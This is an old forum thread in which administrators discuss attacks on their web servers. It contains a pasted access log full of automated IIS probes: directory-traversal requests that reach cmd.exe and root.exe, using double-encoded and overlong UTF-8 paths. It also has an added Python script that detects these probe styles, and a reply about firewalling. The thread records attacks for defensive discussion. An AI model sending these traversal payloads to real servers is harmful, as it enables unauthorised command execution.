02.04.2002
What and where: analysed methods of how and which attacks took place on the net (by: GA, 18:53:54)
http://advice.networkice.com/advice/Intrusions/

And now some administrators are going weak at the knees?

Re: What and where: analysed methods of how and which attacks took place on the net (by: Trap11, 21:50:46)
Here is the excerpt from a log file of a real attack (since the server runs on *** -in any case not under Windows- the attack makes no sense, but the attackers are probably too stupid to grasp that, because the server has been under attack for days):

192.35.240.103 - - [02/Apr/2002:04:34:08 -0500] "GET / HTTP/1.1" 200 902 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows 98; Win 9x 4.90)"
192.35.240.103 - - [02/Apr/2002:04:34:15 -0500] "GET /Movie1.swf HTTP/1.1" 200 77207 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows 98; Win 9x 4.90)"
193.195.130.13 - - [02/Apr/2002:04:35:43 -0500] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 210 "-" "-"
193.195.130.13 - - [02/Apr/2002:04:35:46 -0500] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 208 "-" "-"
193.195.130.13 - - [02/Apr/2002:04:35:46 -0500] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 218 "-" "-"
193.195.130.13 - - [02/Apr/2002:04:35:47 -0500] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 218 "-" "-"
193.195.130.13 - - [02/Apr/2002:04:35:47 -0500] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 232 "-" "-"
193.195.130.13 - - [02/Apr/2002:04:35:48 -0500] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 249 "-" "-"
193.195.130.13 - - [02/Apr/2002:04:35:48 -0500] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 249 "-" "-"
193.195.130.13 - - [02/Apr/2002:04:35:48 -0500] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 265 "-" "-"
193.195.130.13 - - [02/Apr/2002:04:35:49 -0500] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 231 "-" "-"
193.195.130.13 - - [02/Apr/2002:04:35:49 -0500] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 231 "-" "-"
193.195.130.13 - - [02/Apr/2002:04:35:49 -0500] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 231 "-" "-"
193.195.130.13 - - [02/Apr/2002:04:35:49 -0500] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 231 "-" "-"
193.195.130.13 - - [02/Apr/2002:04:35:50 -0500] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 215 "-" "-"
193.195.130.13 - - [02/Apr/2002:04:35:50 -0500] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 215 "-" "-"
193.195.130.13 - - [02/Apr/2002:04:35:50 -0500] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 232 "-" "-"
193.195.130.13 - - [02/Apr/2002:04:35:50 -0500] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 232 "-" "-"
211.196.100.93 - - [02/Apr/2002:04:36:15 -0500] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 210 "-" "-"
211.196.100.93 - - [02/Apr/2002:04:36:15 -0500] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 208 "-" "-"
211.196.100.93 - - [02/Apr/2002:04:36:17 -0500] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 218 "-" "-"
211.196.100.93 - - [02/Apr/2002:04:36:17 -0500] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 218 "-" "-"
211.196.100.93 - - [02/Apr/2002:04:36:18 -0500] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 232 "-" "-"
211.196.100.93 - - [02/Apr/2002:04:36:18 -0500] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 249 "-" "-"
211.196.100.93 - - [02/Apr/2002:04:36:19 -0500] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 249 "-" "-"
211.196.100.93 - - [02/Apr/2002:04:36:19 -0500] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 265 "-" "-"
211.196.100.93 - - [02/Apr/2002:04:36:19 -0500] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 231 "-" "-"
211.196.100.93 - - [02/Apr/2002:04:36:20 -0500] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 231 "-" "-"
211.196.100.93 - - [02/Apr/2002:04:36:20 -0500] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 231 "-" "-"
211.196.100.93 - - [02/Apr/2002:04:36:21 -0500] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 231 "-" "-"
211.196.100.93 - - [02/Apr/2002:04:36:21 -0500] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 215 "-" "-"
211.196.100.93 - - [02/Apr/2002:04:36:22 -0500] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 215 "-" "-"
211.196.100.93 - - [02/Apr/2002:04:36:22 -0500] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 232 "-" "-"
211.196.100.93 - - [02/Apr/2002:04:36:23 -0500] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 232 "-" "-"
61.136.108.254 - - [02/Apr/2002:04:36:25 -0500] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 210 "-" "-"
61.136.108.254 - - [02/Apr/2002:04:36:26 -0500] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 208 "-" "-"
61.136.108.254 - - [02/Apr/2002:04:36:27 -0500] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 218 "-" "-"
61.136.108.254 - - [02/Apr/2002:04:36:29 -0500] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 218 "-" "-"
61.136.108.254 - - [02/Apr/2002:04:36:30 -0500] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 232 "-" "-"
61.136.108.254 - - [02/Apr/2002:04:36:32 -0500] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 249 "-" "-"
61.136.108.254 - - [02/Apr/2002:04:36:33 -0500] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 249 "-" "-"
61.136.108.254 - - [02/Apr/2002:04:36:34 -0500] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 265 "-" "-"
61.136.108.254 - - [02/Apr/2002:04:36:35 -0500] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 231 "-" "-"
61.136.108.254 - - [02/Apr/2002:04:36:37 -0500] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 231 "-" "-"
61.136.108.254 - - [02/Apr/2002:04:36:38 -0500] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 231 "-" "-"
61.136.108.254 - - [02/Apr/2002:04:36:39 -0500] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 231 "-" "-"
61.136.108.254 - - [02/Apr/2002:04:36:41 -0500] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 215 "-" "-"
61.136.108.254 - - [02/Apr/2002:04:36:42 -0500] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 215 "-" "-"
61.136.108.254 - - [02/Apr/2002:04:36:43 -0500] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 232 "-" "-"
61.136.108.254 - - [02/Apr/2002:04:36:45 -0500] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 232 "-" "-"
61.171.28.243 - - [02/Apr/2002:04:43:52 -0500] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 210 "-" "-"
61.171.28.243 - - [02/Apr/2002:04:43:53 -0500] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 208 "-" "-"
61.171.28.243 - - [02/Apr/2002:04:43:54 -0500] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 218 "-" "-"
61.171.28.243 - - [02/Apr/2002:04:43:55 -0500] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 218 "-" "-"
61.171.28.243 - - [02/Apr/2002:04:43:57 -0500] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 232 "-" "-"
61.171.28.243 - - [02/Apr/2002:04:43:58 -0500] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 249 "-" "-"
61.171.28.243 - - [02/Apr/2002:04:43:59 -0500] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 249 "-" "-"
61.171.28.243 - - [02/Apr/2002:04:44:01 -0500] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 265 "-" "-"
61.171.28.243 - - [02/Apr/2002:04:44:02 -0500] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 231 "-" "-"
61.171.28.243 - - [02/Apr/2002:04:44:03 -0500] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 231 "-" "-"
61.171.28.243 - - [02/Apr/2002:04:44:05 -0500] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 231 "-" "-"
61.171.28.243 - - [02/Apr/2002:04:44:06 -0500] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 231 "-" "-"
61.171.28.243 - - [02/Apr/2002:04:44:07 -0500] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 215 "-" "-"
61.171.28.243 - - [02/Apr/2002:04:44:08 -0500] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 215 "-" "-"
61.171.28.243 - - [02/Apr/2002:04:44:10 -0500] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 232 "-" "-"
61.171.28.243 - - [02/Apr/2002:04:44:11 -0500] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 232 "-" "-"
213.229.46.2 - - [02/Apr/2002:04:44:56 -0500] "GET / HTTP/1.1" 200 902 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0; T312461)"
213.229.46.2 - - [02/Apr/2002:04:44:57 -0500] "GET /Movie1.swf HTTP/1.1" 200 77207 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0; T312461)"
165.121.116.141 - - [02/Apr/2002:04:48:32 -0500] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 210 "-" "-"
165.121.116.141 - - [02/Apr/2002:04:48:35 -0500] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 208 "-" "-"
165.121.116.141 - - [02/Apr/2002:04:48:39 -0500] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 218 "-" "-"
165.121.116.141 - - [02/Apr/2002:04:48:41 -0500] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 218 "-" "-"
24.157.228.172 - - [02/Apr/2002:04:49:28 -0500] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 210 "-" "-"
24.157.228.172 - - [02/Apr/2002:04:49:28 -0500] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 208 "-" "-"
24.157.228.172 - - [02/Apr/2002:04:49:28 -0500] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 218 "-" "-"
24.157.228.172 - - [02/Apr/2002:04:49:28 -0500] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 218 "-" "-"
24.157.228.172 - - [02/Apr/2002:04:49:29 -0500] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 232 "-" "-"
24.157.228.172 - - [02/Apr/2002:04:49:29 -0500] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 249 "-" "-"
24.157.228.172 - - [02/Apr/2002:04:49:29 -0500] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 249 "-" "-"
24.157.228.172 - - [02/Apr/2002:04:49:29 -0500] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 265 "-" "-"
24.157.228.172 - - [02/Apr/2002:04:49:29 -0500] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 231 "-" "-"
24.157.228.172 - - [02/Apr/2002:04:49:29 -0500] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 231 "-" "-"
24.157.228.172 - - [02/Apr/2002:04:49:29 -0500] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 231 "-" "-"
24.157.228.172 - - [02/Apr/2002:04:49:29 -0500] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 231 "-" "-"
24.157.228.172 - - [02/Apr/2002:04:49:29 -0500] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 215 "-" "-"
24.157.228.172 - - [02/Apr/2002:04:49:29 -0500] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 215 "-" "-"
24.157.228.172 - - [02/Apr/2002:04:49:30 -0500] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 232 "-" "-"
24.157.228.172 - - [02/Apr/2002:04:49:30 -0500] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 232 "-" "-"
210.219.219.194 - - [02/Apr/2002:04:51:04 -0500] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 210 "-" "-"
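
A way to triage a log like the excerpt above, as an added example that is not part of the original post: it decodes each request path twice and tallies, per client, the probe styles visible in the log (shell executables, directory traversal, double percent-encoding, and the `%c0`/`%c1` overlong UTF-8 lead bytes). The names `classify` and `scan` and the label strings are choices made for this example.

```python
import re
from collections import Counter, defaultdict
from urllib.parse import unquote_to_bytes

# Five lines copied from the excerpt above: one browser hit, four probes.
SAMPLE = r'''192.35.240.103 - - [02/Apr/2002:04:34:08 -0500] "GET / HTTP/1.1" 200 902 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows 98; Win 9x 4.90)"
193.195.130.13 - - [02/Apr/2002:04:35:43 -0500] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 210 "-" "-"
193.195.130.13 - - [02/Apr/2002:04:35:47 -0500] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 232 "-" "-"
193.195.130.13 - - [02/Apr/2002:04:35:49 -0500] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 231 "-" "-"
193.195.130.13 - - [02/Apr/2002:04:35:50 -0500] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 215 "-" "-"
'''

# Combined log format: ip ident user [time] "METHOD path proto" status ...
LINE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) [^"]*" (\d{3}) ')

def classify(path):
    """Return the set of probe labels that apply to one request path."""
    labels = set()
    once = unquote_to_bytes(path)    # what a correct server decodes
    twice = unquote_to_bytes(once)   # what a double-decoding server would see
    if twice != once:
        labels.add("double-encoding")    # e.g. %255c, %25%35%63, %%35c
    if b"\xc0" in twice or b"\xc1" in twice:
        labels.add("overlong-utf8")      # C0/C1 never occur in valid UTF-8
    if b"../" in twice or b"..\\" in twice:
        labels.add("traversal")
    low = twice.lower()
    if b"cmd.exe" in low or b"root.exe" in low:
        labels.add("windows-shell")
    return labels

def scan(log_text):
    """Map client IP -> Counter of probe labels; clean clients are omitted."""
    hits = defaultdict(Counter)
    for line in log_text.splitlines():
        m = LINE.match(line)
        if not m:
            continue                     # skip lines in another format
        ip, _method, path, _status = m.groups()
        for label in classify(path):
            hits[ip][label] += 1
    return dict(hits)

if __name__ == "__main__":
    for ip, counts in scan(SAMPLE).items():
        print(ip, dict(counts))
```
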

03.04.2002
Re: What and where: analysed methods of how and which attacks took place on the net (by: Ronny C., 09:12:28)
These are almost always some automatically running scripts of some so-called script kiddies who try everything. I have a Domino Go Webserver running under WSeB -> I can send you megabytes of such logs. I have not found a real solution for this silliness. At least no attack has been successful so far. :-)
I was only able to work around the problem by installing a firewall (actually only "the mini version" from TCP/IP 4.3) for port 80 as well. (That does not work, however, if you want to put a web server on the Internet -> in my case the Domino Go Webserver is only meant to serve the intranet.)

If Microsoft is the answer I want my problem back!
